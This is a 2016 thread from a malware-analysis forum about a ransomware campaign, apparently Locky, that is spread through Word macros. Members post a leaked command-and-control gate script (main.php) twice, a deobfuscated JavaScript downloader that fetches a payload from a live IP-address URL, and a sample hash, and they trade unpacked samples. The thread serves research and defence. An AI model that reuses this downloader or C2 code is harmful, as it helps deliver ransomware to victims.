A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #27891  by maddog4012
 Wed Feb 17, 2016 7:42 pm
this malware is dropped from a word doc that arrives in E-mail
You do not have the required permissions to view the files attached to this post.
 #27893  by benkow_
 Thu Feb 18, 2016 8:49 am
Not really usefull but during some minutes, the panel server has some problem and we was been able to download php files.
gates: (main.php)
Code: Select all
<?php
declare(strict_types=1);
require_once(__DIR__.'/settings.php');
require_once(__DIR__.'/functions.php');

if (!isset($_SERVER['REQUEST_METHOD']) || $_SERVER['REQUEST_METHOD'] != 'POST') exit_error(404);
if (!($data = @file_get_contents('php://input'))) exit_error(404);
parse_str(decrypt_bot_request($data), $_POST);
if (empty($_POST['id']) || empty($_POST['act'])) exit_error(404);
$id = get_id();

/*
$data = print_r($_POST, true);
$fh = fopen('ppplog', 'a');
fwrite($fh, $data."\n----------------------------\n");
fclose($fh);
*/

$script = __DIR__.'/actions/'.trim(basename($_POST['act'])).'.php';
if (!@file_exists($script)) exit_error(404);
require_once($script);
?>
 #27897  by eli
 Thu Feb 18, 2016 12:43 pm
Seems like it stopped working. Servers taken down?
 #27924  by frank_boldewin
 Tue Feb 23, 2016 4:23 pm
eli wrote:Seems like it stopped working. Servers taken down?
maddog4012's doc file starts a macro with some ofuscated vb-code and decodes to following code:
Code: Select all
function downloadToFile(url,file)
{
	var xhr=new ActiveXObject("msxml2.xmlhttp");
	ado=new ActiveXObject("ADODB.Stream");
	xhr.open("GET",url,false);
	xhr.send();
	if(xhr.status===200)
	{
		ado.type=1;
		ado.open();
		ado.write(xhr.responseBody);
		ado.saveToFile(file);
		ado.close();
		return xhr.responseBody; 
	}
}

downloadToFile('http://66.133.129.5/~chuckgilbert/09u8h76f/65fg67n',fundamentally);
The executable can still be downloaded.
 #27931  by frank_boldewin
 Wed Feb 24, 2016 2:14 pm
Just in case one is interested. attached is an unpacked version of locky.
You do not have the required permissions to view the files attached to this post.
 #27934  by w0rm
 Wed Feb 24, 2016 5:38 pm
There seems to be a version with a new DGA but I don't have access to the sample. Can anyone retrieve it?

73304ca4e455286b7a63ed71af48390a

Bonus points for unpacked =)
 #27939  by FafZee
 Thu Feb 25, 2016 8:37 am
Unpacked in attachment
You do not have the required permissions to view the files attached to this post.
 #27950  by p1nk
 Fri Feb 26, 2016 7:12 am
benkow_ wrote:Not really usefull but during some minutes, the panel server has some problem and we was been able to download php files.
gates: (main.php)
Code: Select all
<?php
declare(strict_types=1);
require_once(__DIR__.'/settings.php');
require_once(__DIR__.'/functions.php');

if (!isset($_SERVER['REQUEST_METHOD']) || $_SERVER['REQUEST_METHOD'] != 'POST') exit_error(404);
if (!($data = @file_get_contents('php://input'))) exit_error(404);
parse_str(decrypt_bot_request($data), $_POST);
if (empty($_POST['id']) || empty($_POST['act'])) exit_error(404);
$id = get_id();

/*
$data = print_r($_POST, true);
$fh = fopen('ppplog', 'a');
fwrite($fh, $data."\n----------------------------\n");
fclose($fh);
*/

$script = __DIR__.'/actions/'.trim(basename($_POST['act'])).'.php';
if (!@file_exists($script)) exit_error(404);
require_once($script);
?>

Do you have an archive of all the collected PHP pages?
  • 1
  • 2
  • 3
  • 4
  • 5
  • 15